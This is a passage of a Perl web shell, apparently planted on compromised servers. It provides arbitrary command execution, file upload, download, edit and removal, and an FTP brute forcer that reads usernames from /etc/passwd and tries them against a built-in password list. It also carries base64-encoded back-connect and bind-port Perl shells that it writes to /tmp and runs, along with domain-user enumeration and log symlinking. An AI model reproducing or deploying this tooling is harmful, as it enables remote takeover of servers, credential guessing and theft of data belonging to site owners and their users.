reading\n\t{\n\t\tif(\$WinNT)\n\t\t{\n\t\t\tbinmode(SENDFILE);\n\t\t\tbinmode(STDOUT);\n\t\t}\n\t\t\$FileSize = (stat(\$SendFile))[7];\n\t\t(\$Filename = \$SendFile) =~  m!([^/^\\\\]*)\$!;\n\t\tprint \"Content-Type: application/x-unknown\\n\";\n\t\tprint \"Content-Length: \$FileSize\\n\";\n\t\tprint \"Content-Disposition: attachment; filename=\$1\\n\\n\";\n\t\tprint while(<SENDFILE>);\n\t\tclose(SENDFILE);\n\t\texit(1);\n\t}\n\telse # failed to open file\n\t{\n\t\t\$result .= \"Failed to download \$SendFile: \$!\";\n\t\t\$result .=&PrintFileDownloadForm;\n\t}\n\treturn \$result;\n}\n\n\n#------------------------------------------------------------------------------\n# This function is called when the user downloads a file. It displays a message\n# to the user and provides a link through which the file can be downloaded.\n# This function is also called when the user clicks on that link. In this case,\n# the file is read and sent to the browser.\n#------------------------------------------------------------------------------\nsub BeginDownload\n{\n\t# get fully qualified path of the file to be downloaded\n\tif((\$WinNT & (\$TransferFile =~ m/^\\\\|^.:/)) |\n\t\t(!\$WinNT & (\$TransferFile =~ m/^\\//))) # path is absolute\n\t{\n\t\t\$TargetFile = \$TransferFile;\n\t}\n\telse # path is relative\n\t{\n\t\tchop(\$TargetFile) if(\$TargetFile = \$CurrentDir) =~ m/[\\\\\\/]\$/;\n\t\t\$TargetFile .= \$PathSep.\$TransferFile;\n\t}\n\n\tif(\$Options eq \"go\") # we have to send the file\n\t{\n\t\t&SendFileToBrowser(\$TargetFile);\n\t}\n\telse # we have to send only the link page\n\t{\n\t\t&PrintDownloadLinkPage(\$TargetFile);\n\t}\n}\n\n#------------------------------------------------------------------------------\n# This function is called when the user wants to upload a file. If the\n# file is not specified, it displays a form allowing the user to specify a\n# file, otherwise it starts the upload process.\n#------------------------------------------------------------------------------\nsub UploadFile\n{\n\t# if no file is specified, print the upload form again\n\tif(\$TransferFile eq \"\")\n\t{\n\t\treturn &PrintFileUploadForm;\n\n\t}\n\tmy \$result=\"\";\n\t# start the uploading process\n\t\$result .= \"Uploading \$TransferFile to \$CurrentDir...<br>\";\n\n\t# get the fullly qualified pathname of the file to be created\n\tchop(\$TargetName) if (\$TargetName = \$CurrentDir) =~ m/[\\\\\\/]\$/;\n\t\$TransferFile =~ m!([^/^\\\\]*)\$!;\n\t\$TargetName .= \$PathSep.\$1;\n\n\t\$TargetFileSize = length(\$in{'filedata'});\n\t# if the file exists and we are not supposed to overwrite it\n\tif(-e \$TargetName && \$Options ne \"overwrite\")\n\t{\n\t\t\$result .= \"Failed: Destination file already exists.<br>\";\n\t}\n\telse # file is not present\n\t{\n\t\tif(open(UPLOADFILE, \">\$TargetName\"))\n\t\t{\n\t\t\tbinmode(UPLOADFILE) if \$WinNT;\n\t\t\tprint UPLOADFILE \$in{'filedata'};\n\t\t\tclose(UPLOADFILE);\n\t\t\t\$result .= \"Transfered \$TargetFileSize Bytes.<br>\";\n\t\t\t\$result .= \"File Path: \$TargetName<br>\";\n\t\t}\n\t\telse\n\t\t{\n\t\t\t\$result .= \"Failed: \$!<br>\";\n\t\t}\n\t}\n\t\$result .= &PrintCommandLineInputForm;\n\treturn \$result;\n}\n\n#------------------------------------------------------------------------------\n# This function is called when the user wants to download a file. If the\n# filename is not specified, it displays a form allowing the user to specify a\n# file, otherwise it displays a message to the user and provides a link\n# through  which the file can be downloaded.\n#------------------------------------------------------------------------------\nsub DownloadFile\n{\n\t# if no file is specified, print the download form again\n\tif(\$TransferFile eq \"\")\n\t{\n\t\t&PrintPageHeader(\"f\");\n\t\treturn &PrintFileDownloadForm;\n\t}\n\t\n\t# get fully qualified path of the file to be downloaded\n\tif((\$WinNT & (\$TransferFile =~ m/^\\\\|^.:/)) | (!\$WinNT & (\$TransferFile =~ m/^\\//))) # path is absolute\n\t{\n\t\t\$TargetFile = \$TransferFile;\n\t}\n\telse # path is relative\n\t{\n\t\tchop(\$TargetFile) if(\$TargetFile = \$CurrentDir) =~ m/[\\\\\\/]\$/;\n\t\t\$TargetFile .= \$PathSep.\$TransferFile;\n\t}\n\n\tif(\$Options eq \"go\") # we have to send the file\n\t{\n\t\treturn &SendFileToBrowser(\$TargetFile);\n\t}\n\telse # we have to send only the link page\n\t{\n\t\treturn &PrintDownloadLinkPage(\$TargetFile);\n\t}\n}\n\n\n#------------------------------------------------------------------------------\n# This function is called to execute commands. It displays the output of the\n# command and allows the user to enter another command. The change directory\n# command is handled differently. In this case, the new directory is stored in\n# an internal variable and is used each time a command has to be executed. The\n# output of the change directory command is not displayed to the users\n# therefore error messages cannot be displayed.\n#------------------------------------------------------------------------------\nsub ExecuteCommand\n{\n\tmy \$result=\"\";\n\tif(\$RunCommand =~ m/^\\s*cd\\s+(.+)/) # it is a change dir command\n\t{\n\t\t# we change the directory internally. The output of the\n\t\t# command is not displayed.\n\t\t\$Command = \"cd \\\"\$CurrentDir\\\"\".\$CmdSep.\"cd \$1\".\$CmdSep.\$CmdPwd;\n\t\tchop(\$CurrentDir = `\$Command`);\n\t\t\$result .= &PrintCommandLineInputForm;\n\n\t\t\$result .= \"Command: <run>\$RunCommand </run><br><textarea cols='\$cols' rows='\$rows' spellcheck='false'>\";\n\t\t# xuat thong tin khi chuyen den 1 thu muc nao do!\n\t\t\$RunCommand= \$WinNT?\"dir\":\"dir -lia\";\n\t\t\$result .= &RunCmd;\n\t}elsif(\$RunCommand =~ m/^\\s*edit\\s+(.+)/)\n\t{\n\t\t\$result .=  &SaveFileForm;\n\t}else\n\t{\n\t\t\$result .= &PrintCommandLineInputForm;\n\t\t\$result .= \"Command: <run>\$RunCommand</run><br><textarea id='data' cols='\$cols' rows='\$rows' spellcheck='false'>\";\n\t\t\$result .=&RunCmd;\n\t}\n\t\$result .=  \"</textarea>\";\n\treturn \$result;\n}\n\n#------------------------------------------------------------------------\n# run command\n#------------------------------------------------------------------------\n\nsub RunCmd\n{\n\tmy \$result=\"\";\n\t\$Command = \"cd \\\"\$CurrentDir\\\"\".\$CmdSep.\$RunCommand.\$Redirector;\n\tif(!\$WinNT)\n\t{\n\t\t\$SIG{'ALRM'} = \\&CommandTimeout;\n\t\talarm(\$CommandTimeoutDuration);\n\t}\n\tif(\$ShowDynamicOutput) # show output as it is generated\n\t{\n\t\t\$|=1;\n\t\t\$Command .= \" |\";\n\t\topen(CommandOutput, \$Command);\n\t\twhile(<CommandOutput>)\n\t\t{\n\t\t\t\$_ =~ s/(\\n|\\r\\n)\$//;\n\t\t\t\$result .= &HtmlSpecialChars(\"\$_\\n\");\n\t\t}\n\t\t\$|=0;\n\t}\n\telse # show output after command completes\n\t{\n\t\t\$result .= &HtmlSpecialChars('\$Command');\n\t}\n\tif(!\$WinNT)\n\t{\n\t\talarm(0);\n\t}\n\treturn \$result;\n}\n#==============================================================================\n# Form Save File \n#==============================================================================\nsub SaveFileForm\n{\n\tmy \$result =\"\";\n\tsubstr(\$RunCommand,0,5)=\"\";\n\tmy \$file=&trim(\$RunCommand);\n\t\$save='<br><input name=\"a\" type=\"submit\" value=\"save\" class=\"submit\" >';\n\t\$File=\$CurrentDir.\$PathSep.\$RunCommand;\n\tmy \$dir=\"<span style='font: 11pt Verdana; font-weight: bold;'>\".&AddLinkDir(\"gui\").\"</span>\";\n\tif(-w \$File)\n\t{\n\t\t\$rows=\"23\"\n\t}else\n\t{\n\t\t\$msg=\"<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>\";\n\t\t\$rows=\"20\"\n\t}\n\t\$Prompt = \$WinNT ? \"\$dir > \" : \"<font color='#FFFFFF'>[admin\\@\$ServerName \$dir]\\\$</font> \";\n\t\$read=(\$WinNT)?\"type\":\"less\";\n\t\$RunCommand = \"\$read \\\"\$RunCommand\\\"\";\n\t\$result .=  <<END;\n\t<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n\n\t<input type=\"hidden\" name=\"d\" value=\"\$CurrentDir\">\n\t\$Prompt\n\t<input type=\"text\" size=\"40\" name=\"c\">\n\t<input name=\"s\" class=\"submit\" type=\"submit\" value=\"Enter\">\n\t<br>Command: <run> \$RunCommand </run>\n\t<input type=\"hidden\" name=\"file\" value=\"\$file\" > \$save <br> \$msg\n\t<br><textarea id=\"data\" name=\"data\" cols=\"\$cols\" rows=\"\$rows\" spellcheck=\"false\">\nEND\n\t\n\t\$result .= &RunCmd;\n\t\$result .=  \"</textarea>\";\n\t\$result .=  \"</form>\";\n\treturn \$result;\n}\n#==============================================================================\n# Save File\n#==============================================================================\nsub SaveFile(\$)\n{\n\tmy \$Data= shift ;\n\tmy \$File= shift;\n\t\$File=\$CurrentDir.\$PathSep.\$File;\n\tif(open(FILE, \">\$File\"))\n\t{\n\t\tbinmode FILE;\n\t\tprint FILE \$Data;\n\t\tclose FILE;\n\t\treturn 1;\n\t}else\n\t{\n\t\treturn 0;\n\t}\n}\n#------------------------------------------------------------------------------\n# Brute Forcer Form\n#------------------------------------------------------------------------------\nsub BruteForcerForm\n{\n\tmy \$result=\"\";\n\t\$result .= <<END;\n\n<table>\n\n<tr>\n<td colspan=\"2\" align=\"center\">\n####################################<br>\nSimple FTP brute forcer<br>\n####################################\n<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n\n<input type=\"hidden\" name=\"a\" value=\"bruteforcer\"/>\n</td>\n</tr>\n<tr>\n<td>User:<br><textarea rows=\"18\" cols=\"30\" name=\"user\">\nEND\nchop(\$result .= `less /etc/passwd | cut -d: -f1`);\n\$result .= <<'END';\n</textarea></td>\n<td>\n\nPass:<br>\n<textarea rows=\"18\" cols=\"30\" name=\"pass\">123pass\n123!@#\n123admin\n123abc\n123456admin\n1234554321\n12344321\npass123\nadmin\nadmincp\nadministrator\nmatkhau\npassadmin\np@ssword\np@ssw0rd\npassword\n123456\n1234567\n12345678\n123456789\n1234567890\n111111\n000000\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999\n123123\n234234\n345345\n456456\n567567\n678678\n789789\n123321\n456654\n654321\n7654321\n87654321\n987654321\n0987654321\nadmin123\nadmin123456\nabcdef\nabcabc\n!@#!@#\n!@#\$%^\n!@#\$%^&*(\n!@#\$\$#@!\nabc123\nanhyeuem\niloveyou</textarea>\n</td>\n</tr>\n<tr>\n<td colspan=\"2\" align=\"center\">\nSleep:<select name=\"sleep\">\n\n<option>0</option>\n<option>1</option>\n<option>2</option>\n\n<option>3</option>\n</select> \n<input type=\"submit\" class=\"submit\" value=\"Brute Forcer\"/></td></tr>\n</form>\n</table>\nEND\nreturn \$result;\n}\n#------------------------------------------------------------------------------\n# Brute Forcer\n#------------------------------------------------------------------------------\nsub BruteForcer\n{\n\tmy \$result=\"\";\n\t\$Server=\$ENV{'SERVER_ADDR'};\n\tif(\$in{'user'} eq \"\")\n\t{\n\t\t\$result .= &BruteForcerForm;\n\t}else\n\t{\n\t\tuse Net::FTP; \n\t\t@user= split(/\\n/, \$in{'user'});\n\t\t@pass= split(/\\n/, \$in{'pass'});\n\t\tchomp(@user);\n\t\tchomp(@pass);\n\t\t\$result .= \"<br><br>[+] Trying brute \$ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\\n\";\n\t\tforeach \$username (@user)\n\t\t{\n\t\t\tif(!(\$username eq \"\"))\n\t\t\t{\n\t\t\t\tforeach \$password (@pass)\n\t\t\t\t{\n\t\t\t\t\t\$ftp = Net::FTP->new(\$Server) or die \"Could not connect to \$ServerName\\n\"; \n\t\t\t\t\tif(\$ftp->login(\"\$username\",\"\$password\"))\n\t\t\t\t\t{\n\t\t\t\t\t\t\$result .= \"<a target='_blank' href='ftp://\$username:\$password\\@\$Server'>[+] ftp://\$username:\$password\\@\$Server</a><br>\\n\";\n\t\t\t\t\t\t\$ftp->quit();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\tif(!(\$in{'sleep'} eq \"0\"))\n\t\t\t\t\t{\n\t\t\t\t\t\tsleep(int(\$in{'sleep'}));\n\t\t\t\t\t}\n\t\t\t\t\t\$ftp->quit();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\$result .= \"\\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\\n\";\n\t}\n\treturn \$result;\n}\n#------------------------------------------------------------------------------\n# Backconnect Form\n#------------------------------------------------------------------------------\nsub BackBindForm\n{\n\treturn <<END;\n\t<br><br>\n\n\t<table>\n\t<tr>\n\t<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n\t<td>BackConnect: <input type=\"hidden\" name=\"a\" value=\"backbind\"></td>\n\t<td> Host: <input type=\"text\" size=\"20\" name=\"clientaddr\" value=\"\$ENV{'REMOTE_ADDR'}\">\n\t Port: <input type=\"text\" size=\"7\" name=\"clientport\" value=\"80\" onkeyup=\"document.getElementById('ba').innerHTML=this.value;\"></td>\n\n\t<td><input name=\"s\" class=\"submit\" type=\"submit\" name=\"submit\" value=\"Connect\"></td>\n\t</form>\n\t</tr>\n\t<tr>\n\t<td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!\n\t<br>[+] Try check your Port with <a target=\"_blank\" href=\"http://www.canyouseeme.org/\">http://www.canyouseeme.org/</a>\n\t<br>[+] Client listen with command: <run>nc -vv -l -p <span id=\"ba\">80</span></run></font></td>\n\n\t</tr>\n\t</table>\n\n\t<br><br>\n\t<table>\n\t<tr>\n\t<form method=\"POST\" action=\"\$ScriptLocation\">\n\t<td>Bind Port: <input type=\"hidden\" name=\"a\" value=\"backbind\"></td>\n\n\t<td> Port: <input type=\"text\" size=\"15\" name=\"clientport\" value=\"1412\" onkeyup=\"document.getElementById('bi').innerHTML=this.value;\">\n\n\t Password: <input type=\"text\" size=\"15\" name=\"bindpass\" value=\"THIEUGIABUON\"></td>\n\t<td><input name=\"s\" class=\"submit\" type=\"submit\" name=\"submit\" value=\"Bind\"></td>\n\t</form>\n\t</tr>\n\t<tr>\n\t<td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!\n\t<br>[+] Try command: <run>nc \$ENV{'SERVER_ADDR'} <span id=\"bi\">1412</span></run></font></td>\n\n\t</tr>\n\t</table><br>\nEND\n}\n#------------------------------------------------------------------------------\n# Backconnect use perl\n#------------------------------------------------------------------------------\nsub BackBind\n{\n\tuse MIME::Base64;\n\tuse Socket;\t\n\t\$backperl=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7\";\n\t\$bindperl=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=\";\n\n\t\$ClientAddr = \$in{'clientaddr'};\n\t\$ClientPort = int(\$in{'clientport'});\n\tif(\$ClientPort eq 0)\n\t{\n\t\treturn &BackBindForm;\n\t}elsif(!\$ClientAddr eq \"\")\n\t{\n\t\t\$Data=decode_base64(\$backperl);\n\t\tif(-w \"/tmp/\")\n\t\t{\n\t\t\t\$File=\"/tmp/backconnect.pl\";\t\n\t\t}else\n\t\t{\n\t\t\t\$File=\$CurrentDir.\$PathSep.\"backconnect.pl\";\n\t\t}\n\t\topen(FILE, \">\$File\");\n\t\tprint FILE \$Data;\n\t\tclose FILE;\n\t\tsystem(\"perl backconnect.pl \$ClientAddr \$ClientPort\");\n\t\tunlink(\$File);\n\t\texit 0;\n\t}else\n\t{\n\t\t\$Data=decode_base64(\$bindperl);\n\t\tif(-w \"/tmp\")\n\t\t{\n\t\t\t\$File=\"/tmp/bindport.pl\";\t\n\t\t}else\n\t\t{\n\t\t\t\$File=\$CurrentDir.\$PathSep.\"bindport.pl\";\n\t\t}\n\t\topen(FILE, \">\$File\");\n\t\tprint FILE \$Data;\n\t\tclose FILE;\n\t\tsystem(\"perl bindport.pl \$ClientPort\");\n\t\tunlink(\$File);\n\t\texit 0;\n\t}\n}\n#------------------------------------------------------------------------------\n#  Array List Directory\n#------------------------------------------------------------------------------\nsub RmDir(\$) \n{\n\tmy \$dir = shift;\n    if(opendir(DIR,\$dir))\n\t{\n\t\twhile(\$file = readdir(DIR))\n\t\t{\n\t\t\tif((\$file ne \".\") && (\$file ne \"..\"))\n\t\t\t{\n\t\t\t\t\$file= \$dir.\$PathSep.\$file;\n\t\t\t\tif(-d \$file)\n\t\t\t\t{\n\t\t\t\t\t&RmDir(\$file);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tunlink(\$file);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tclosedir(DIR);\n\t}\n\tif(!rmdir(\$dir))\n\t{\n\t\t\n\t}\n}\nsub FileOwner(\$)\n{\n\tmy \$file = shift;\n\tif(-e \$file)\n\t{\n\t\t(\$uid,\$gid) = (stat(\$file))[4,5];\n\t\tif(\$WinNT)\n\t\t{\n\t\t\treturn \"???\";\n\t\t}\n\t\telse\n\t\t{\n\t\t\t\$name=getpwuid(\$uid);\n\t\t\t\$group=getgrgid(\$gid);\n\t\t\treturn \$name.\"/\".\$group;\n\t\t}\n\t}\n\treturn \"???\";\n}\nsub ParentFolder(\$)\n{\n\tmy \$path = shift;\n\tmy \$Comm = \"cd \\\"\$CurrentDir\\\"\".\$CmdSep.\"cd ..\".\$CmdSep.\$CmdPwd;\n\tchop(\$path = `\$Comm`);\n\treturn \$path;\n}\nsub FilePerms(\$)\n{\n\tmy \$file = shift;\n\tmy \$ur = \"-\";\n\tmy \$uw = \"-\";\n\tif(-e \$file)\n\t{\n\t\tif(\$WinNT)\n\t\t{\n\t\t\tif(-r \$file){ \$ur = \"r\"; }\n\t\t\tif(-w \$file){ \$uw = \"w\"; }\n\t\t\treturn \$ur . \" / \" . \$uw;\n\t\t}else\n\t\t{\n\t\t\t\$mode=(stat(\$file))[2];\n\t\t\t\$result = sprintf(\"%04o\", \$mode & 07777);\n\t\t\treturn \$result;\n\t\t}\n\t}\n\treturn \"0000\";\n}\nsub FileLastModified(\$)\n{\n\tmy \$file = shift;\n\tif(-e \$file)\n\t{\n\t\t(\$la) = (stat(\$file))[9];\n\t\t(\$d,\$m,\$y,\$h,\$i) = (localtime(\$la))[3,4,5,2,1];\n\t\t\$y = \$y + 1900;\n\t\t@month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;\n\t\t\$lmtime = sprintf(\"%02d/%s/%4d %02d:%02d\",\$d,\$month[\$m],\$y,\$h,\$i);\n\t\treturn \$lmtime;\n\t}\n\treturn \"???\";\n}\nsub FileSize(\$)\n{\n\tmy \$file = shift;\n\tif(-f \$file)\n\t{\n\t\treturn -s \$file;\n\t}\n\treturn \"0\";\n\n}\nsub ParseFileSize(\$)\n{\n\tmy \$size = shift;\n\tif(\$size <= 1024)\n\t{\n\t\treturn \$size. \" B\";\n\t}\n\telse\n\t{\n\t\tif(\$size <= 1024*1024) \n\t\t{\n\t\t\t\$size = sprintf(\"%.02f\",\$size / 1024);\n\t\t\treturn \$size.\" KB\";\n\t\t}\n\t\telse \n\t\t{\n\t\t\t\$size = sprintf(\"%.2f\",\$size / 1024 / 1024);\n\t\t\treturn \$size.\" MB\";\n\t\t}\n\t}\n}\nsub trim(\$)\n{\n\tmy \$string = shift;\n\t\$string =~ s/^\\s+//;\n\t\$string =~ s/\\s+\$//;\n\treturn \$string;\n}\nsub AddSlashes(\$)\n{\n\tmy \$string = shift;\n\t\$string=~ s/\\\\/\\\\\\\\/g;\n\treturn \$string;\n}\nsub ListDir\n{\n\tmy \$path = \$CurrentDir.\$PathSep;\n\t\$path=~ s/\\\\\\\\/\\\\/g;\n\tmy \$result = \"<form name='f' action='\$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ \".&AddLinkDir(\"gui\").\" ] </span><input type='text' name='d' size='40' value='\$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>\";\n\tif(-d \$path)\n\t{\n\t\tmy @fname = ();\n\t\tmy @dname = ();\n\t\tif(opendir(DIR,\$path))\n\t\t{\n\t\t\twhile(\$file = readdir(DIR))\n\t\t\t{\n\t\t\t\t\$f=\$path.\$file;\n\t\t\t\tif(-d \$f)\n\t\t\t\t{\n\t\t\t\t\tpush(@dname,\$file);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tpush(@fname,\$file);\n\t\t\t\t}\n\t\t\t}\n\t\t\tclosedir(DIR);\n\t\t}\n\t\t@fname = sort { lc(\$a) cmp lc(\$b) } @fname;\n\t\t@dname = sort { lc(\$a) cmp lc(\$b) } @dname;\n\t\t\$result .= \"<div><table width='90%' class='listdir'>\n\n\t\t<tr style='background-color: #3e3e3e'><th>File Name</th>\n\t\t<th style='width:100px;'>File Size</th>\n\t\t<th style='width:150px;'>Owner</th>\n\t\t<th style='width:100px;'>Permission</th>\n\t\t<th style='width:150px;'>Last Modified</th>\n\t\t<th style='width:260px;'>Action</th></tr>\";\n\t\tmy \$style=\"line\";\n\t\tmy \$i=0;\n\t\tforeach my \$d (@dname)\n\t\t{\n\t\t\t\$style= (\$style eq \"line\") ? \"notline\": \"line\";\n\t\t\t\$d = &trim(\$d);\n\t\t\t\$dirname=\$d;\n\t\t\tif(\$d eq \"..\") \n\t\t\t{\n\t\t\t\t\$d = &ParentFolder(\$path);\n\t\t\t}\n\t\t\telsif(\$d eq \".\") \n\t\t\t{\n\t\t\t\t\$d = \$path;\n\t\t\t}\n\t\t\telse \n\t\t\t{\n\t\t\t\t\$d = \$path.\$d;\n\t\t\t}\n\t\t\t\$result .= \"<tr class='\$style'>\n\n\t\t\t<td id='File_\$i' style='font: 11pt Verdana; font-weight: bold;'><a  href='?a=gui&d=\".\$d.\"'>[ \".\$dirname.\" ]</a></td>\";\n\t\t\t\$result .= \"<td>DIR</td>\";\n\t\t\t\$result .= \"<td style='text-align:center;'>\".&FileOwner(\$d).\"</td>\";\n\t\t\t\$result .= \"<td id='FilePerms_\$i' style='text-align:center;' ondblclick=\\\"rm_chmod_form(this,\".\$i.\",'\".&FilePerms(\$d).\"','\".\$dirname.\"')\\\" ><span onclick=\\\"chmod_form(\".\$i.\",'\".\$dirname.\"')\\\" >\".&FilePerms(\$d).\"</span></td>\";\n\t\t\t\$result .= \"<td style='text-align:center;'>\".&FileLastModified(\$d).\"</td>\";\n\t\t\t\$result .= \"<td style='text-align:center;'><a href='javascript:return false;' onclick=\\\"rename_form(\$i,'\$dirname','\".&AddSlashes(&AddSlashes(\$d)).\"')\\\">Rename</a>  | <a onclick=\\\"if(!confirm('Remove dir: \$dirname ?')) { return false;}\\\" href='?a=gui&d=\$path&remove=\$dirname'>Remove</a></td>\";\n\t\t\t\$result .= \"</tr>\";\n\t\t\t\$i++;\n\t\t}\n\t\tforeach my \$f (@fname)\n\t\t{\n\t\t\t\$style= (\$style eq \"line\") ? \"notline\": \"line\";\n\t\t\t\$file=\$f;\n\t\t\t\$f = \$path.\$f;\n\t\t\t\$view = \"?dir=\".\$path.\"&view=\".\$f;\n\t\t\t\$result .= \"<tr class='\$style'><td id='File_\$i' style='font: 11pt Verdana;'><a href='?a=command&d=\".\$path.\"&c=edit%20\".\$file.\"'>\".\$file.\"</a></td>\";\n\t\t\t\$result .= \"<td>\".&ParseFileSize(&FileSize(\$f)).\"</td>\";\n\t\t\t\$result .= \"<td style='text-align:center;'>\".&FileOwner(\$f).\"</td>\";\n\t\t\t\$result .= \"<td id='FilePerms_\$i' style='text-align:center;' ondblclick=\\\"rm_chmod_form(this,\".\$i.\",'\".&FilePerms(\$f).\"','\".\$file.\"')\\\" ><span onclick=\\\"chmod_form(\$i,'\$file')\\\" >\".&FilePerms(\$f).\"</span></td>\";\n\t\t\t\$result .= \"<td style='text-align:center;'>\".&FileLastModified(\$f).\"</td>\";\n\t\t\t\$result .= \"<td style='text-align:center;'><a href='?a=command&d=\".\$path.\"&c=edit%20\".\$file.\"'>Edit</a> | <a href='javascript:return false;' onclick=\\\"rename_form(\$i,'\$file','f')\\\">Rename</a> | <a href='?a=download&o=go&f=\".\$f.\"'>Download</a> | <a onclick=\\\"if(!confirm('Remove file: \$file ?')) { return false;}\\\" href='?a=gui&d=\$path&remove=\$file'>Remove</a></td>\";\n\t\t\t\$result .= \"</tr>\";\n\t\t\t\$i++;\n\t\t}\n\t\t\$result .= \"</table></div>\";\n\t}\n\treturn \$result;\n}\n#------------------------------------------------------------------------------\n# Try to View List User\n#------------------------------------------------------------------------------\nsub ViewDomainUser\n{\n\topen (domains, '/etc/named.conf') or \$err=1;\n\tmy @cnzs = <domains>;\n\tclose d0mains;\n\tmy \$style=\"line\";\n\tmy \$result=\"<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>\";\n\tif (\$err)\n\t{\n\t\t\$result .=  ('<p>C0uldn\\'t Bypass it , Sorry</p>');\n\t\treturn \$result;\n\t}else\n\t{\n\t\t\$result .= '<table><tr><th>Domains</th> <th>User</th></tr>';\n\t}\n\tforeach my \$one (@cnzs)\n\t{\n\t\tif(\$one =~ m/.*?zone \"(.*?)\" {/)\n\t\t{\t\n\t\t\t\$style= (\$style eq \"line\") ? \"notline\": \"line\";\n\t\t\t\$filename= \"/etc/valiases/\".\$one;\n\t\t\t\$owner = getpwuid((stat(\$filename))[4]);\n\t\t\t\$result .= '<tr class=\"\$style\" width=50%><td>'.\$one.' </td><td> '.\$owner.'</td></tr>';\n\t\t}\n\t}\n\t\$result .= '</table>';\n\treturn \$result;\n}\n#------------------------------------------------------------------------------\n# View Log\n#------------------------------------------------------------------------------\nsub ViewLog\n{\n\tif(\$WinNT)\n\t{\n\t\treturn \"<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>\";\n\t}\n\tmy \$result=\"<table><tr><th>Path Log</th><th>Submit</th></tr>\";\n\tmy @pathlog=(\n\t\t\t\t'/usr/local/apache/logs/error_log',\n\t\t\t\t'/var/log/httpd/error_log',\n\t\t\t\t'/usr/local/apache/logs/access_log'\n\t\t\t\t);\n\tmy \$i=0;\n\tmy \$perms;\n\tmy \$sl;\n\tforeach my \$log (@pathlog)\n\t{\n\t\tif(-w \$log)\n\t\t{\n\t\t\t\$perms=\"OK\";\n\t\t}else\n\t\t{\n\t\t\tchop(\$sl = `ln -s \$log error_log_\$i`);\n\t\t\tif(&trim(\$ls) eq 